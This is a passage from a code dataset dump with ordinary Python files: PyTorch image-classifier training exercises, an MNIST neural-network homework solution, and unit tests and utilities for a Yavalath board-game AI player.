nn.BatchNorm1d(512),\n\t\t\tnn.Dropout(0.5),\n nn.Linear(512, 512),\n nn.ReLU(),\n\t\t\tnn.BatchNorm1d(512),\n\t\t\tnn.Dropout(0.5),\n\t\t\tnn.Linear(512, 512),\n nn.ReLU(),\n\t\t\tnn.BatchNorm1d(512),\n\t\t\tnn.Dropout(0.5),\n\t\t\tnn.Linear(512, 512),\n nn.ReLU(),\n\t\t\tnn.BatchNorm1d(512),\n\t\t\tnn.Dropout(0.5),\n nn.Linear(512, 10)\n ).to(device)\n\t\tself.num_epochs = 0\n\t\tself.train_loss_list = []\n\t\tself.val_loss_list = []\n\t\tself.train_accuracy = []\n\t\tself.val_accuracy = []\n\n\tdef forward(self, x):\n\t\tx = self.flatten(x)\n\t\tlogits = self.linear_relu_stack(x)\n\t\treturn logits\n\n\tdef history(self):\n\t\treturn self.train_loss_list, self.val_loss_list, self.train_accuracy, self.val_accuracy, self.num_epochs\n\n###\nnet = FullyConnectedNN()\ntrain(net, trainloader, valloader, num_epochs=10)\nshow_learning_curve(*net.history(), title=\"Learning Curves - Fully Connected NN\")\n###\ntest(net, testloader)\n###\nclass ConvNN(nn.Module):\n\tdef __init__(self):\n\t\tsuper(ConvNN, self).__init__()\n\t\tself.feature_extraction = nn.Sequential(\n\t\t\tnn.Conv2d(num_channels, 128, 3), # 64 64 3 => 31 31\n\t\t\tnn.ReLU(),\n\t\t\tnn.BatchNorm2d(128),\n\t\t\tnn.MaxPool2d(2),\n\t\t\tnn.Conv2d(128, 64, 3),\n\t\t\tnn.ReLU(),\n\t\t\tnn.BatchNorm2d(64),\n\t\t\tnn.MaxPool2d(2),\n\t\t).to(device)\n\t\tself.flatten = nn.Flatten()\n\t\tself.linear_relu_stack = nn.Sequential(\n\t\t\tnn.Linear(12544, 1024),\n\t\t\tnn.ReLU(),\n\t\t\tnn.Dropout(0.5),\n\t\t\tnn.Linear(1024, 512),\n nn.ReLU(),\n\t\t\tnn.Dropout(0.5),\n\t\t\tnn.Linear(512, 10)\n\t\t).to(device)\n\n\t\tself.num_epochs = 0\n\t\tself.train_loss_list = []\n\t\tself.val_loss_list = []\n\t\tself.train_accuracy = []\n\t\tself.val_accuracy = []\n\n\tdef forward(self, x):\n\t\tx = self.feature_extraction(x)\n\t\tx = self.flatten(x)\n\t\tlogits = self.linear_relu_stack(x)\n\t\treturn logits\n\n\tdef history(self):\n\t\treturn self.train_loss_list, self.val_loss_list, self.train_accuracy, self.val_accuracy, self.num_epochs\n###\nnet = ConvNN()\n# summary(net, (num_channels, cropped_size, cropped_size))\n###\ntrain(net, trainloader, valloader, num_epochs=30)\nshow_learning_curve(*net.history(), title=\"Learning Curves - Convolutional NN\")\n###\ntest(net, testloader)\n###\nclass MobileNetV2FetureExt_FrozenNN(nn.Module):\n\tdef __init__(self, pretrained=True):\n\t\tsuper(MobileNetV2FetureExt_FrozenNN, self).__init__()\n\t\tself.feature_extractor = torch.hub.load('pytorch/vision:v0.10.0', 'mobilenet_v2', pretrained=True).to(device)\n\t\t# Freeze all layers\n\t\tfor param in self.feature_extractor.parameters():\n\t\t\tparam.requires_grad = False\n\t\t# Unfreeze last layer (1000 neurons):\n\t\tparams = self.feature_extractor.state_dict()\n\t\tparams.get('classifier.1.weight').requires_grad = True\n\t\tparams.get('classifier.1.bias').requires_grad = True\n\t\t# Add the top layer to the model.\n\t\t# It consists of Relu, dropout, and an additional Fully Connected (1000 neurons as well) with\n\t\t# Relu and dropout as well. 
After that comes the classification layer (10 neurons)\n\t\tself.linear_relu_stack = nn.Sequential(\n\t\t\tnn.ReLU(),\n\t\t\tnn.Dropout(0.3),\n\t\t\tnn.Linear(1000, 1000),\n\t\t\tnn.ReLU(),\n\t\t\tnn.Dropout(0.3),\n\t\t\tnn.Linear(1000, 10)).to(device)\n\n\n\t\tself.num_epochs = 0\n\t\tself.train_loss_list = []\n\t\tself.val_loss_list = []\n\t\tself.train_accuracy = []\n\t\tself.val_accuracy = []\n\n\tdef forward(self, x):\n\n\t\tx = self.feature_extractor(x)\n\t\t# x = self.flatten(x)\n\t\tlogits = self.linear_relu_stack(x)\n\t\treturn logits\n\n\tdef history(self):\n\t\treturn self.train_loss_list, self.val_loss_list, self.train_accuracy, self.val_accuracy, self.num_epochs\n\n\n\n###\nnet = MobileNetV2FetureExt_FrozenNN()\n# summary(net, (num_channels, cropped_size, cropped_size))\n###\ntrain(net, trainloader, valloader,100)\nshow_learning_curve(*net.history(), title=\"Learning Curves - MobileNetV2 (Frozen Conv Blocks)\")\n###\ntest(net, testloader)\n###\n\nclass MobileNetV2FetureExtNN(nn.Module):\n\tdef __init__(self, pretrained=True):\n\t\tsuper(MobileNetV2FetureExtNN, self).__init__()\n\t\tself.feature_extractor = torch.hub.load('pytorch/vision:v0.10.0', 'mobilenet_v2', pretrained=True).to(device)\n\n\t\t# This time we only add the top layer to the model.\n\t\t# It consists of Relu, dropout, and an additional Fully Connected (1000 neurons as well) with\n\t\t# Relu and dropout as well. After that comes the classification layer (10 neurons)\n\t\tself.linear_relu_stack = nn.Sequential(\n\t\t\tnn.ReLU(),\n\t\t\t# nn.Dropout(0.3),\n\t\t\tnn.Linear(1000, 1000),\n\t\t\tnn.ReLU(),\n\t\t\t# nn.Dropout(0.3),\n\t\t\tnn.Linear(1000, 10)).to(device)\n\n\n\t\tself.num_epochs = 0\n\t\tself.train_loss_list = []\n\t\tself.val_loss_list = []\n\t\tself.train_accuracy = []\n\t\tself.val_accuracy = []\n\n\tdef forward(self, x):\n\n\t\tx = self.feature_extractor(x)\n\t\t# x = self.flatten(x)\n\t\tlogits = self.linear_relu_stack(x)\n\t\treturn logits\n\n\tdef history(self):\n\t\treturn self.train_loss_list, self.val_loss_list, self.train_accuracy, self.val_accuracy, self.num_epochs\n\n\n\n###\nnet = MobileNetV2FetureExtNN(pretrained=False).to(device)\n# summary(net, (num_channels, cropped_size, cropped_size))\n###\ntrain(net, trainloader, valloader, 100)\nshow_learning_curve(*net.history(), title=\"Learning Curves - MobileNetV2 (Whole Model Trainable)\")\n###\ntest(net, testloader)\n###\n","repo_name":"moshebeutel/DL_BIU","sub_path":"ex3/DeepLearningEx3.py","file_name":"DeepLearningEx3.py","file_ext":"py","file_size_in_byte":14087,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74430261287","text":"# When taking sqrt for initialization you might want to use math package,\n# since torch.sqrt requires a tensor, and math.sqrt is ok with integer\nimport math\nfrom typing import List\n\nimport matplotlib.pyplot as plt\nimport torch\nfrom torch.distributions import Uniform\nfrom torch.nn import Module\nfrom torch.nn.functional import cross_entropy, relu\nfrom torch.nn.parameter import Parameter\nfrom torch.optim import Adam\nfrom torch.utils.data import DataLoader, TensorDataset\nfrom tqdm import tqdm\nimport numpy as np\n\nfrom utils import load_dataset, problem\n\n\nclass F1(Module):\n @problem.tag(\"hw3-A\", start_line=1)\n def __init__(self, h: int, d: int, k: int):\n \"\"\"Create a F1 model as described in pdf.\n\n Args:\n h (int): Hidden dimension.\n d (int): Input dimension/number of features.\n k (int): Output dimension/number of classes.\n 
\"\"\"\n super().__init__()\n # raise NotImplementedError(\"Your Code Goes Here\")\n self.h = h\n self.d = d\n self.k = k\n self.alpha_0 = 1 / np.sqrt(d)\n self.alpha_1 = 1 / np.sqrt(h)\n self.W0 = torch.FloatTensor(h, d).uniform_(-self.alpha_0, self.alpha_0)\n self.b0 = torch.FloatTensor(1, h).uniform_(-self.alpha_0, self.alpha_0)\n self.W1 = torch.FloatTensor(k, h).uniform_(-self.alpha_1, self.alpha_1)\n self.b1 = torch.FloatTensor(1, k).uniform_(-self.alpha_1, self.alpha_1)\n\n self.params = [self.W0, self.b0, self.W1, self.b1]\n for param in self.params:\n param.requires_grad = True\n\n @problem.tag(\"hw3-A\")\n def forward(self, x: torch.Tensor) -> torch.Tensor:\n \"\"\"\n Pass input through F1 model.\n\n It should perform operation:\n W_1(sigma(W_0*x + b_0)) + b_1\n\n Args:\n x (torch.Tensor): FloatTensor of shape (n, d). Input data.\n\n Returns:\n torch.Tensor: LongTensor of shape (n, k). Prediction.\n \"\"\"\n # raise NotImplementedError(\"Your Code Goes Here\")\n x = torch.matmul(x, self.W0.T) + self.b0\n x = relu(x)\n x = torch.matmul(x, self.W1.T) + self.b1\n return x\n\n\nclass F2(Module):\n @problem.tag(\"hw3-A\", start_line=1)\n def __init__(self, h0: int, h1: int, d: int, k: int):\n \"\"\"Create a F2 model as described in pdf.\n\n Args:\n h0 (int): First hidden dimension (between first and second layer).\n h1 (int): Second hidden dimension (between second and third layer).\n d (int): Input dimension/number of features.\n k (int): Output dimension/number of classes.\n \"\"\"\n super().__init__()\n # raise NotImplementedError(\"Your Code Goes Here\")\n self.h0 = h0\n self.h1 = h1\n self.d = d\n self.k = k\n self.alpha_0 = 1 / np.sqrt(d)\n self.alpha_1 = 1 / np.sqrt(h0)\n self.alpha_2 = 1 / np.sqrt(h1)\n self.W0 = torch.FloatTensor(h0, d).uniform_(-self.alpha_0, self.alpha_0)\n self.b0 = torch.FloatTensor(1, h0).uniform_(-self.alpha_0, self.alpha_0)\n self.W1 = torch.FloatTensor(h1, h0).uniform_(-self.alpha_1, self.alpha_1)\n self.b1 = torch.FloatTensor(1, h1).uniform_(-self.alpha_1, self.alpha_1)\n self.W2 = torch.FloatTensor(k, h1).uniform_(-self.alpha_2, self.alpha_2)\n self.b2 = torch.FloatTensor(1, k).uniform_(-self.alpha_2, self.alpha_2)\n\n self.params = [self.W0, self.b0, self.W1, self.b1, self.W2, self.b2]\n for param in self.params:\n param.requires_grad = True\n\n @problem.tag(\"hw3-A\")\n def forward(self, x: torch.Tensor) -> torch.Tensor:\n \"\"\"\n Pass input through F2 model.\n\n It should perform operation:\n W_2(sigma(W_1(sigma(W_0*x + b_0)) + b_1) + b_2)\n\n Args:\n x (torch.Tensor): FloatTensor of shape (n, d). Input data.\n\n Returns:\n torch.Tensor: LongTensor of shape (n, k). Prediction.\n \"\"\"\n # raise NotImplementedError(\"Your Code Goes Here\")\n x = torch.matmul(x, self.W0.T) + self.b0\n x = relu(x)\n x = torch.matmul(x, self.W1.T) + self.b1\n x = relu(x)\n x = torch.matmul(x, self.W2.T) + self.b2\n return x\n\n\n@problem.tag(\"hw3-A\")\ndef train(model: Module, optimizer: Adam, train_loader: DataLoader) -> List[float]:\n \"\"\"\n Train a model until it reaches 99% accuracy on train set, and return list of training crossentropy losses for each epochs.\n\n Args:\n model (Module): Model to train. 
Either F1, or F2 in this problem.\n optimizer (Adam): Optimizer that will adjust parameters of the model.\n train_loader (DataLoader): DataLoader with training data.\n You can iterate over it like a list, and it will produce tuples (x, y),\n where x is FloatTensor of shape (n, d) and y is LongTensor of shape (n,).\n\n Returns:\n List[float]: List containing average loss for each epoch.\n \"\"\"\n # raise NotImplementedError(\"Your Code Goes Here\")\n losses = []\n for i in range(32):\n loss_epoch = 0\n acc = 0\n for batch in tqdm(train_loader):\n x, y = batch\n x = x.view(-1, 784) # reshape to 784 x 1\n optimizer.zero_grad()\n logits = model.forward(x)\n preds = torch.argmax(logits, 1)\n acc += torch.sum(preds == y).item()\n loss = cross_entropy(logits, y)\n loss_epoch += loss.item()\n loss.backward()\n optimizer.step()\n\n print(\"Epoch \", i + 1)\n print(\"Loss:\", loss_epoch / len(train_loader.dataset))\n print(\"Acc:\", acc / len(train_loader.dataset))\n losses.append(loss_epoch / len(train_loader.dataset))\n if acc / len(train_loader.dataset) > 0.99:\n break\n return losses\n\n\ndef get_acc_test(test_loader, model):\n acc = 0\n loss_epoch = 0\n for batch in tqdm(test_loader):\n x, y = batch\n x = x.view(-1, 784)\n\n logits = model.forward(x)\n preds = torch.argmax(logits, 1)\n acc += torch.sum(preds == y).item()\n loss = cross_entropy(logits, y)\n loss_epoch += loss.item()\n\n l = loss_epoch / len(test_loader.dataset)\n a = acc / len(test_loader.dataset)\n return l, a\n\n\n@problem.tag(\"hw3-A\", start_line=5)\ndef main():\n \"\"\"\n Main function of this problem.\n For both F1 and F2 models it should:\n 1. Train a model\n 2. Plot per epoch losses\n 3. Report accuracy and loss on test set\n 4. Report total number of parameters for each network\n\n Note that we provided you with code that loads MNIST and changes x's and y's to correct type of tensors.\n We strongly advise that you use torch functionality such as datasets, but as mentioned in the pdf you cannot use anything from torch.nn other than what is imported here.\n \"\"\"\n (x, y), (x_test, y_test) = load_dataset(\"mnist\")\n x = torch.from_numpy(x).float()\n y = torch.from_numpy(y).long()\n x_test = torch.from_numpy(x_test).float()\n y_test = torch.from_numpy(y_test).long()\n # raise NotImplementedError(\"Your Code Goes Here\")\n train_dataset = TensorDataset(x, y)\n train_l = DataLoader(train_dataset, batch_size=128, shuffle=True)\n test_dataset = TensorDataset(x_test, y_test)\n test_l = DataLoader(test_dataset, batch_size=128, shuffle=True)\n # F1 model\n M1 = F1(h=64, d=784, k=10)\n opt = Adam(M1.params, lr=0.001)\n l1 = train(M1, opt, train_l)\n # print(l)\n\n # plot for F1 model\n epo_time = range(1, len(l1) + 1)\n plt.plot(epo_time, l1)\n plt.xlabel('epoch')\n plt.ylabel('loss')\n plt.title('Training Loss for F1 model')\n plt.show()\n\n # valid the test set\n ll, aa = get_acc_test(test_l, M1)\n print(\"Test dataset:\")\n print(\"Loss:\", ll)\n print(\"Acc:\", aa)\n\n # number of parameter\n num_of_param_F1 = 0\n for p in M1.params:\n num_of_param_F1 += np.prod(p.shape)\n print(\"There are\", num_of_param_F1, \"trainable parameters in model for F1.\")\n print(\"####################################################################\") # seperate line\n ###########################################################################\n # F2 model\n M2 = F2(h0=32, h1=32, d=784, k=10)\n opt = Adam(M2.params, lr=0.001)\n l2 = train(M2, opt, train_l)\n # print(l)\n\n # plot for F2 model\n epo_time = range(1, len(l2) + 1)\n 
plt.plot(epo_time, l2)\n plt.xlabel('epoch')\n plt.ylabel('loss')\n plt.title('Training Loss for F2 model')\n plt.show()\n\n # valid the test set\n ll, aa = get_acc_test(test_l, M2)\n print(\"Test dataset:\")\n print(\"Loss:\", ll)\n print(\"Acc:\", aa)\n\n # number of parameter\n num_of_param_F2 = 0\n for p in M2.params:\n num_of_param_F2 += np.prod(p.shape)\n print(\"There are\", num_of_param_F2, \"trainable parameters in model for F2.\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"poanchen1997/Machine_Learning","sub_path":"Neural Network_mnist/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8883,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3419047765","text":"import unittest\nimport yavalath_engine\nfrom players import blue_player\nimport pprint\nimport collections\nimport pickle\nimport timeit\nimport numpy\nimport pathlib\nimport itertools\n\nclass TestDarrylPlayer(unittest.TestCase):\n def test_moves_to_vec(self):\n print(blue_player.moves_to_board_vector([]))\n print(blue_player.moves_to_board_vector([\"e1\"]))\n\n def test_vector_player(self):\n blue_player.vector_player([])\n\n\n\nclass TestConditions(unittest.TestCase):\n def test_win_conditions_board_4(self):\n game_so_far = ['e3', 'b1', 'e4']\n state = blue_player.GameState(game_so_far)\n def index_to_moves(index_iterable):\n return {state.options[index] for index in index_iterable}\n\n self.assertSetEqual(index_to_moves(state.white_winning_moves), set())\n self.assertSetEqual(index_to_moves(state.black_winning_moves), set())\n self.assertSetEqual(index_to_moves(state.white_losing_moves), {'e2', 'e5'}) # Winning conditions imply 2 losing conditions\n self.assertSetEqual(index_to_moves(state.black_losing_moves), set())\n self.assertSetEqual(index_to_moves(state.white_single_checks), {'e1', 'e6'}) # This is a new condition, but not a new check.\n self.assertSetEqual(index_to_moves(state.black_single_checks), set())\n self.assertSetEqual(index_to_moves(state.white_multi_checks), set())\n self.assertSetEqual(index_to_moves(state.black_multi_checks), set())\n\n def test_win_conditions_board_3(self):\n game_so_far = ['a1', 'b1', 'a2', 'b2', 'a4', 'b4']\n state = blue_player.GameState(game_so_far)\n def index_to_moves(index_iterable):\n return {state.options[index] for index in index_iterable}\n\n self.assertSetEqual(index_to_moves(state.white_winning_moves), {'a3'})\n self.assertSetEqual(index_to_moves(state.black_winning_moves), {'b3'})\n self.assertSetEqual(index_to_moves(state.white_losing_moves), {'a3'}) # Winning conditions imply 2 losing conditions\n self.assertSetEqual(index_to_moves(state.black_losing_moves), {'b3'}) # Winning conditions imply 2 losing conditions\n self.assertSetEqual(index_to_moves(state.white_single_checks), {'a5'}) # This is a new condition, but not a new check.\n self.assertSetEqual(index_to_moves(state.black_single_checks), {'b5'})\n self.assertSetEqual(index_to_moves(state.white_multi_checks), set())\n self.assertSetEqual(index_to_moves(state.black_multi_checks), set())\n\n def test_win_conditions_board_2(self):\n game_so_far = ['a1', 'b1', 'a2', 'b2', 'a4']\n state = blue_player.GameState(game_so_far)\n def index_to_moves(index_iterable):\n return {state.options[index] for index in index_iterable}\n\n self.assertSetEqual(index_to_moves(state.white_winning_moves), {'a3'})\n self.assertSetEqual(index_to_moves(state.black_winning_moves), set())\n self.assertSetEqual(index_to_moves(state.white_losing_moves), 
{'a3'}) # Winning conditions imply 2 losing conditions\n self.assertSetEqual(index_to_moves(state.black_losing_moves), {'b3'})\n self.assertSetEqual(index_to_moves(state.white_single_checks), {'a5'}) # This is a new condition, but not a new check.\n self.assertSetEqual(index_to_moves(state.black_single_checks), {'b4'})\n self.assertSetEqual(index_to_moves(state.white_multi_checks), set())\n self.assertSetEqual(index_to_moves(state.black_multi_checks), set())\n\n def test_win_conditions_board_1(self):\n game_so_far = ['a1']\n state = blue_player.GameState(game_so_far)\n\n def index_to_moves(index_iterable):\n return {state.options[index] for index in index_iterable}\n\n self.assertSetEqual(index_to_moves(state.white_winning_moves), set())\n self.assertSetEqual(index_to_moves(state.black_winning_moves), set())\n self.assertSetEqual(index_to_moves(state.white_losing_moves), set())\n self.assertSetEqual(index_to_moves(state.black_losing_moves), set())\n self.assertSetEqual(index_to_moves(state.white_single_checks), set())\n self.assertSetEqual(index_to_moves(state.black_single_checks), set())\n self.assertSetEqual(index_to_moves(state.white_multi_checks), set())\n self.assertSetEqual(index_to_moves(state.black_multi_checks), set())\n\n def test_win_conditions_empty_board(self):\n game_so_far = []\n state = blue_player.GameState(game_so_far)\n\n def index_to_moves(index_iterable):\n return {state.options[index] for index in index_iterable}\n\n self.assertSetEqual(index_to_moves(state.white_winning_moves), set())\n self.assertSetEqual(index_to_moves(state.black_winning_moves), set())\n self.assertSetEqual(index_to_moves(state.white_losing_moves), set())\n self.assertSetEqual(index_to_moves(state.black_losing_moves), set())\n self.assertSetEqual(index_to_moves(state.white_single_checks), set())\n self.assertSetEqual(index_to_moves(state.black_single_checks), set())\n self.assertSetEqual(index_to_moves(state.white_multi_checks), set())\n self.assertSetEqual(index_to_moves(state.black_multi_checks), set())\n\n def test_potential_moves(self):\n def test_game_so_far(game_so_far):\n board = yavalath_engine.HexBoard()\n state = blue_player.GameState(game_so_far)\n self.assertEqual(len(state.options), 61-len(game_so_far), \"The number of options is wrong for game: {}.\".format(game_so_far))\n options = [space_to_index[space] for space in state.options]\n self.assertEqual(state.white_potential_moves.shape, (62, 62-len(game_so_far))) # 62 rows for the spaces + \"1\", 61-len(game) columns for potential moves + the \"no move\"\n for board_space in range(61): # Always 61, since the board size is fixed\n for potential_move_index in range(len(state.options)): # Just the number of options\n expected = 1 if board_space == options[potential_move_index] else 0\n if board.spaces[board_space] in game_so_far: # a1\n expected = 1 if board_space in state.white_move_indices else -1\n self.assertEqual(state.white_potential_moves[board_space, potential_move_index], expected,\n \"Mismatch for board_space:{}, potential_move_index:{}\".format(board_space, potential_move_index))\n for board_space in range(61):\n potential_move_index = len(state.options)\n expected = 1 if board_space in state.white_move_indices else -1 if board_space in state.black_move_indices else 0\n self.assertEqual(state.white_potential_moves[board_space, potential_move_index], expected,\n \"Mismatch for 'no move' column, board_space:{}, potential_move_index:{}\".format(board_space, potential_move_index))\n for potential_move_index in 
range(len(state.options)): # Just the number of options\n board_space = 61\n self.assertEqual(state.white_potential_moves[board_space, potential_move_index], 1,\n \"Mismatch for 'offset' row, board_space:{}, potential_move_index:{}\".format(board_space, potential_move_index))\n\n def test_all_game_steps(game_so_far):\n for i in range(len(game_so_far)):\n test_game_so_far(game_so_far[0:i])\n\n # If I think there is a gam ewith the potential moves being incorrectly created, add that game here.\n test_all_game_steps(['a1', 'b2', 'a2', 'b1', 'c3'])\n game_so_far = ['g1', 'd5', 'e7', 'b5', 'e1', 'e3', 'i4', 'g4', 'b6', 'e4', 'f5', 'a5', 'c5', 'e8', 'c3', 'd3', 'f4', 'd2']\n test_all_game_steps(game_so_far)\n\n\ndef main1():\n win_C = blue_player.get_win_conditions()\n loss_C = blue_player.get_loss_conditions()\n pprint.pprint(win_C)\n pprint.pprint(win_C.shape)\n pprint.pprint(loss_C)\n pprint.pprint(loss_C.shape)\n print(blue_player.moves_to_board_vector([\"e1\", \"e2\", \"e3\", \"e4\"]).transpose())\n\n\nclass TestMoves(unittest.TestCase):\n\n def test_expected(self):\n player = lambda game: blue_player.vector_player2(game, depth=2)\n blocks = [\n # Pairs of game_so_far, expected_move\n (['a1', 'b1', 'a2', 'b2', 'a4'], 'a3'),\n (['a1', 'b1', 'a2', 'b2', 'a4', 'b4'], 'a3'),\n ]\n for game_so_far, expected_block in blocks:\n move, score = player(game_so_far)\n self.assertEqual(move, expected_block)\n\n\n\n\ndef main2():\n import logging\n blue_player.logger.setLevel(logging.DEBUG)\n game_so_far = ['g1', 'd5', 'e7', 'b5', 'e1', 'e3', 'i4', 'g4', 'b6', 'e4', 'f5', 'a5', 'c5', 'e8', 'c3', 'd3', 'f4', 'd2']\n #game_so_far = ['e8', 'a1', 'a2', 'a3', 'f1', 'a4', 'c1']\n #game_so_far = ['d3']\n print(\"Starting white spaces:\", sorted(game_so_far[::2]))\n print(\"Starting black spaces:\", sorted(game_so_far[1::2]))\n\n r = blue_player.vector_player2(game_so_far, depth=2, verbose=True)\n print(\"Result:\", r)\n\ndef main3():\n v1 = blue_player.get_linear_condition_matrix((1, 1, 1, 1))\n v2 = blue_player.get_win_conditions()\n print(\"v1 == v2:\", (v1 == v2).all())\n\n\n v1 = blue_player.get_linear_condition_matrix((1, 1, 1))\n v2 = blue_player.get_loss_conditions()\n print(\"v1 == v2:\", (v1 == v2).all())\n\n\nspace_to_index = {space: i for i, space in enumerate(yavalath_engine.HexBoard().spaces)}\n\n\ndef get_board_hash(white_move_indices, black_move_indices):\n key = (tuple(sorted(white_move_indices)), tuple(sorted(black_move_indices)))\n return hash(key)\n\ndef get_board_hash2(white_move_indices, black_move_indices):\n white_bitset = int()\n for move in white_move_indices:\n white_bitset |= (1 << move)\n black_bitset = int()\n for move in black_move_indices:\n black_bitset |= (1 << move)\n key = (white_bitset, black_bitset)\n return hash(key)\n\ndef main4():\n game_so_far = \"g1 d5 e7 b5 e1 e3 i4 g4 b6 e4 f5 a5 c5 e8 c3 d3 f4 d2 d4\".split()\n print(\"Starting white spaces:\", game_so_far[::2])\n print(\"Starting black spaces:\", game_so_far[1::2])\n\n white_move_indices = {space_to_index[move] for move in game_so_far[::2]}\n black_move_indices = {space_to_index[move] for move in game_so_far[1::2]}\n\n t = timeit.timeit(lambda: get_board_hash(white_move_indices, black_move_indices))\n print(\"get_board_hash: 1M iterations took {}s\".format(t))\n\n t = timeit.timeit(lambda: get_board_hash2(white_move_indices, black_move_indices))\n print(\"get_board_hash2: 1M iterations took {}s\".format(t))\n\ndef to_str(p):\n if len(p) == 1:\n return p[0].value\n else:\n white, black = p\n return \"{}, 
{}\".format(str(white) if white is None else white.value, str(black) if black is None else black.value)\n\ndef main5():\n signature_table, properties_table = pickle.load(open(\"final.dat\", 'rb'))\n\n for p in sorted([to_str(s) for s in properties_table]):\n print(p)\n index = numpy.nonzero(signature_table)\n print(\"Number of non-zero:\", len(index[0]))\n print(\"Done\")\n\ndef main6():\n properties = dict()\n t = timeit.timeit(lambda: blue_player.NextMoveClassifier.find_wins_and_checks_for_token_and_opp_arms_fast((-1, 0, 0), (0, -1, 0), -1))\n print(t)\n\ndef combine_results_simple(dirs = [r\"data\\laptop_files\", r\"data\\desktop_files\"]):\n \"\"\"This one assumes all sub-results use the same properites dictionary, and that the sentinel value is -1\"\"\"\n final_complete_tasks_filename = \"final_complete_tasks.dat\"\n final_tables_filename = \"final_tables.dat\"\n\n\n one_arm_possibilities = list(itertools.product([-1,0,1], [-1,0,1], [-1,0,1]))\n desired_tasks = set()\n for arm1, arm2 in itertools.product(one_arm_possibilities, one_arm_possibilities):\n task = (arm1, arm2)\n desired_tasks.add(task)\n\n # Load the summary table and complete tasks list, if they exist.\n if pathlib.Path(final_complete_tasks_filename).exists():\n final_complete_tasks = pickle.load(open(final_complete_tasks_filename, 'rb'))\n else:\n final_complete_tasks = set()\n if pathlib.Path(final_tables_filename).exists():\n combined_signature_table, combined_properties_table = pickle.load(open(final_tables_filename, 'rb'))\n else:\n combined_signature_table = None\n combined_properties_table = None\n\n # Join the results\n for dir in dirs:\n print(\"Looking at dir:\", dir)\n p = pathlib.Path(dir)\n for child in p.iterdir():\n if not child.is_file():\n continue\n print(\"Looking at child:\", child)\n if child.name == \"complete_tasks.dat\":\n done_tasks = pickle.load(open(child.as_posix(), 'rb'))\n final_complete_tasks = final_complete_tasks.union(set(done_tasks))\n pickle.dump(file=open(final_complete_tasks_filename, 'wb'), obj=final_complete_tasks)\n elif child.name.find(\"signature_table_worker\") == 0:\n print(\"Loading signature and properties tables from file:\", child.name)\n signature_table, properties_table = pickle.load(open(child.as_posix(), 'rb'))\n print(properties_table[0])\n if combined_properties_table is None:\n combined_properties_table = properties_table\n assert combined_signature_table is None, \"What happened?\"\n combined_signature_table = signature_table\n else:\n # I messed up... I cannot disambiguate a zero meaning \"not yet computed\" from a zero meaning the\n # first entry in the lookup table. Fortunately, I think all zeros mean \"GAME_OVER\" since the first\n # arm will always be (-1,-1,-1) for any task. 
I can pass once more over zeros at the end, I guess\n # Form a mapping from one property table to another\n print(\"Combining properties_tables.\")\n assert properties_table == combined_properties_table, \"Everyone should be using the same table.\"\n\n print(\"Computing index where values >= 0...\")\n index = numpy.where(signature_table >= 0)\n print(\"Updating combined index...\")\n combined_signature_table[index] = signature_table[index] # Assign all non-zero values\n # Should I feel confident that the mappings don't overlap?\n\n print(\"Saving final results to final.dat\")\n final = (combined_signature_table, combined_properties_table)\n pickle.dump(file=open(\"final.dat\", \"wb\"), obj=final)\n\n remaining = desired_tasks - final_complete_tasks\n print(\"All Done: {}, Remaining {}:\\n{}\".format(len(final_complete_tasks), len(remaining), remaining))\n\n print(\"Counting sentinel values...\")\n index = numpy.where(combined_signature_table == -1)\n print(\"Remaining sentinel values:\", len(index[0]))\n\n\ndef main7():\n signature_table, properties_table = pickle.load(open(\"signature_tables.dat\", \"rb\"))\n signatures = numpy.array([\n 303081869,\n 306723378,\n 44801543,\n 173941706,\n ])\n r = numpy.array(properties_table)[signature_table[signatures]]\n pprint.pprint(r)\n\ndef main8():\n signatures = [\n 303081869,\n 306723378,\n 44801543,\n 173941706,\n ]\n for signature in signatures:\n SIGNATURE_OFFSET = sum([3**i for i in range(18)]) # Add this to all signatures to make them >= 0.\n arms = blue_player.NextMoveClassifier.signature_index_to_arms(int(signature))\n print(signature, arms, SIGNATURE_OFFSET+blue_player.NextMoveClassifier.compute_signature(arms))\n signature, properties = blue_player.NextMoveClassifier.compute_signature_and_properties(arms)\n print(signature+SIGNATURE_OFFSET, properties)\n\ndef main9():\n game_so_far = ['g1', 'd5', 'e7', 'b5', 'e1', 'e3', 'i4', 'g4', 'b6', 'e4', 'f5', 'a5', 'c5', 'e8', 'c3', 'd3', 'f4', 'd2']\n # Moves by property:\n # SpaceProperies.WHITE_LOSE: ['c4', 'd6', 'f1', 'f3', 'f6']\n # ERROR: SpaceProperies.BLACK_SINGLE_CHECK: ['b1', 'b3', 'c6', 'd7', 'e6', 'g3'] # b3 is not a check... 
it is already blocked.\n # SpaceProperies.BLACK_WIN: ['d4']\n # SpaceProperies.BLACK_LOSE: ['c1', 'c2', 'd1', 'e2', 'e5', 'f2', 'f3']\n # ERROR: SpaceProperies.GAME_OVER: ['f7', 'h1']\n # SpaceProperies.WHITE_SINGLE_CHECK: ['d4', 'e5', 'f2']\n\n #game_so_far = ['e8', 'a1', 'a2', 'a3', 'f1', 'a4', 'c1']\n # Moves by property:\n # SpaceProperies.BLACK_LOSE: ['a5']\n # game_so_far = ['d3']\n\n move_stack = ['d2', 'b2', 'd4', 'f5', 'd5', 'd3', 'b5', 'c5', 'f1', 'e2', 'f2', 'a1', 'b1', 'c7', 'c6', 'e8', 'g6', 'f6', 'b6', 'd6', 'a3', 'g1']\n game_so_far = ['g2', 'c2', 'g7', 'i5', 'd1', 'e6', 'c4', 'a2', 'b3', 'e5', 'g4', 'g5', 'c1']\n yavalath_engine.Render(board=yavalath_engine.HexBoard(), moves=game_so_far).render_image(\"debug.png\")\n classifier = blue_player.NextMoveClassifier(game_so_far, verbose=True)\n classifier.compute_moves_by_property()\n\ndef regen_status():\n done_tasks = pickle.load(open(\"data/complete_tasks.dat\", 'rb'))\n print(\"{} Local Done:\\n{}\".format(len(done_tasks), done_tasks))\n desktop_done = pickle.load(open(r\"D:\\yavalath\\data/complete_tasks.dat\", 'rb'))\n print(\"{} Desktop Done:\\n{}\".format(len(desktop_done), desktop_done))\n sig_table, prop_table = pickle.load(open(\"data/signature_table_worker_0.dat\", \"rb\"))\n for index, p in enumerate(prop_table):\n print(index, list(i.value if i is not None else \"None\" for i in p))\n print(\"Max(sig_table):{}\".format(sig_table.max()))\n h = numpy.histogram(sig_table, bins=[-1,] + list(range(30)))\n print(h)\n\n\nif __name__ == 